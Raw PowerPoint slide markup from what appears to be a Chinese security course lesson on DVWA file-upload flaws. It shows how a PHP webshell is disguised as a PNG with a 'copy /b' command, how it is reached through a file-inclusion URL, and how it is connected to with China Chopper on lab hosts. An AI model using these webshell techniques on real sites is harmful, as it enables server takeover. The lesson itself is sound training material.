                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“Forward”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>按钮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">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322000" y="2609850"/>
            <a:ext cx="7560000" cy="4050522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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576000" y="1247775"/>
            <a:ext cx="10817860" cy="135001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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析medium级别文件上传源代码代码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）抓包修改上传文件类型</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切换至浏览器，看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上传成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以使用中国菜刀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">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957195" y="2628900"/>
            <a:ext cx="6276975" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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5945" y="1247775"/>
            <a:ext cx="10817860" cy="86550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（1）查看源代码</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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492000" y="1892618"/>
            <a:ext cx="5220000" cy="4794716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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5945" y="1247775"/>
            <a:ext cx="10817860" cy="512381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（1）查看源代码</a:t>
            </a:r>
            <a:endParaRPr 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sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到，只允许上传的文件后缀名为jpg，jpeg，png以及文件大小小于100000字节，getimagesize函数限制了上传文件的文件头必须为图像类型。</a:t>
            </a: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r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）生成上传文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell.png</a:t>
            </a:r>
            <a:endParaRPr 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sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>打开画图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将其保存为p.png。</a:t>
            </a:r>
            <a:endParaRPr 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sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>打开命令行窗口执行：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>copy p.png/b+shell.php/a shell.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>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Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这样，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的头部是图片，尾部是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="仿宋"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5945" y="1247775"/>
            <a:ext cx="10817860" cy="493268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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）上传文件</a:t>
            </a:r>
            <a:endParaRPr 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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   将shell.png文件上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，上传成功。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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933700" y="2800350"/>
            <a:ext cx="6324600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2952750" y="4124325"/>
            <a:ext cx="6286500" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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2147482494"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124710" y="3096895"/>
            <a:ext cx="7762875" cy="3148330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499110" y="1320165"/>
            <a:ext cx="11002010" cy="1621790"/>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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新建网站扫描</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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1）点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Targets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下拉列表，点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Add Target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="457200" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在目标地址栏输入：http://192.168.66.133/mutillidae/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="457200" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在输入描述栏输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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5945" y="1247775"/>
            <a:ext cx="10817860" cy="510667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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）使用中国菜刀</a:t>
            </a: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r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址：http://192.168.1.201/dvwa/vulnerabilities/fi/?page=file:///C:/phpStudy/PHPTutorial/WWW/dvwa/hackable/uploads/shell.png</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">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3711600" y="2228850"/>
            <a:ext cx="4781550" cy="2876550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:rand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5945" y="1247775"/>
            <a:ext cx="10817860" cy="94234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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）使用中国菜刀</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="4572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59296752"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:endParaRPr lang="zh-CN">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5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962000" y="2147570"/>
            <a:ext cx="8280000" cy="4361714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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72770" y="1247775"/>
            <a:ext cx="10817860" cy="44513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3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析impossible级别的文件上传源代码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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6522085" y="2146935"/>
            <a:ext cx="5270500" cy="4081145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Impossible级别对上传的文件进行了重命名（为md5值，导致00截断无法绕过过滤规则）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加入Anti-CSRF token防护CSRF攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对文件的内容作了严格的检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>导致攻击者无法上传含有恶意脚本的文件。</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="970915" y="1692593"/>
            <a:ext cx="5488940" cy="5013325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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文件上传</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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成low级别的文件上传漏洞的利用。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成medium、high和impossible级别的File Upload源代码的分析。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
